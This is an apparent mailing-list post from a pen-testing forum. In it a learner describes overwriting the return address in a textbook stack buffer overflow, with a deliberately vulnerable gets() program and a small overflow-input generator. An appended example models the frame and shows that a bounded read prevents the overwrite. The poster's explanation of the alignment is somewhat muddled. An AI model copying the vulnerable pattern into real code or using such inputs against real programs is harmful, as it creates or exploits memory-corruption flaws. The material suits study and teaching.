Network Security Pen-Test

Re: Re: Controling the eip

Subject: Re: Re: Controling the eip
Date: 16 May 2007 04:10:59 -0000
Hello all, thank you for your responses!
I finally figured out the problem. It was rather interesting so I figured that 
I would share in more detail. 
Firstly the "program" to be exploited:
****************************************
#include <stdio.h>

/* Deliberately vulnerable: gets() reads an unbounded line into a 30-byte
 * stack buffer, so a long input runs past it and overwrites the saved
 * return address. gets() was removed from C11; older compilers still
 * accept it, usually with a warning. */
void return_input(void)
{
        char array[30];
        gets(array);
        printf("%s\n", array);
}

int main(void)
{
        return_input();
        return 0;
}
********************************************
Secondly the new code to produce the ASCII characters of the address to be 
jumped to:
********************************************
#include <stdio.h>
#include <stdint.h>
#include <string.h>

int main(void)
{
    int i;
    char stuffing[41];               /* 40 bytes of pattern plus a terminator */
    uint32_t word = 0x84050804;      /* stored little-endian on x86: 04 08 05 84 */
    for (i = 0; i <= 36; i += 4)
        memcpy(&stuffing[i], &word, 4); /* always 4 bytes; long is 8 on 64-bit */
    stuffing[40] = '\0';             /* puts() stops here instead of reading past the array */
    puts(stuffing);
    return 0;
}
********************************************
The interesting thing is that the address being placed in stuffing is not the 
address that I would like to jump to; that is 0x08048405. The reason for this 
is the buffer size. When I disassembled the function it had a buffer size of 
0x24 (in the book it was 0x20); 0x24 in decimal is 36. So, when I was writing to 
the EIP I was putting the last half of the address onto the EIP 4 bytes (I 
believe, it's been a while since Computer Organization) and then the second 
half. This is because of 36 not being cleanly divisible by 8 (i.e. 8 % 36 != 0). 
I, in my relative 'n00b-ness', found this rather interesting and was elated when 
I found out the source of my troubles.
Thanks for all who responded!
~Peace,
Zach
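An added example, not part of Zach's post, that models the frame layout in memory to show why the repeated word 0x84050804 reads back as 0x08048405 when the return-address slot sits 2 bytes off a 4-byte boundary of the input stream, and why a bounded read (fgets with the array's size) never reaches that slot. The distance from the start of the array to the saved return address is an assumption (it depends on the compiler's frame layout), so both alignments are tried.

```c
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ARRAY_DECL 30   /* declared size of array[] in the victim function */

/* Emit the same byte stream as the stuffing program: `word` stored
 * little-endian every 4 bytes across `len` bytes (04 08 05 84 ...). */
static void fill_pattern(uint8_t *out, size_t len, uint32_t word) {
    for (size_t i = 0; i < len; i++)
        out[i] = (uint8_t)(word >> (8 * (i % 4)));
}

/* The 32-bit little-endian value that sits at byte offset `off`. */
static uint32_t dword_at(const uint8_t *buf, size_t off) {
    uint32_t v = 0;
    for (size_t k = 0; k < 4; k++)
        v |= (uint32_t)buf[off + k] << (8 * k);
    return v;
}

/* Unbounded copy, as gets() behaves: the whole stream lands in the frame,
 * and the value reaching the return slot depends only on ret_off % 4. */
uint32_t ret_after_unbounded(uint32_t word, size_t ret_off) {
    uint8_t frame[64] = {0}, input[64];
    fill_pattern(input, sizeof input, word);
    memcpy(frame, input, ret_off + 4);   /* runs far past the array */
    return dword_at(frame, ret_off);
}

/* Bounded copy, as fgets(array, sizeof array, stdin) behaves: at most
 * ARRAY_DECL-1 bytes are written, so the return slot keeps its value. */
uint32_t ret_after_bounded(uint32_t word, size_t ret_off, uint32_t orig_ret) {
    uint8_t frame[64] = {0}, input[64];
    for (size_t k = 0; k < 4; k++)       /* plant the original return address */
        frame[ret_off + k] = (uint8_t)(orig_ret >> (8 * k));
    fill_pattern(input, sizeof input, word);
    memcpy(frame, input, ARRAY_DECL - 1);
    frame[ARRAY_DECL - 1] = '\0';
    return dword_at(frame, ret_off);
}

int main(void) {
    printf("slot at +40: 0x%08" PRIx32 "\n", ret_after_unbounded(0x84050804u, 40));
    printf("slot at +42: 0x%08" PRIx32 "\n", ret_after_unbounded(0x84050804u, 42));
    printf("bounded:     0x%08" PRIx32 "\n",
           ret_after_bounded(0x84050804u, 40, 0xdeadbeefu));
    return 0;
}
```

At +40 the slot reads 0x84050804 and at +42 it reads 0x08048405, which is the 2-byte shift Zach describes; with the bounded read the slot is untouched regardless of alignment.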
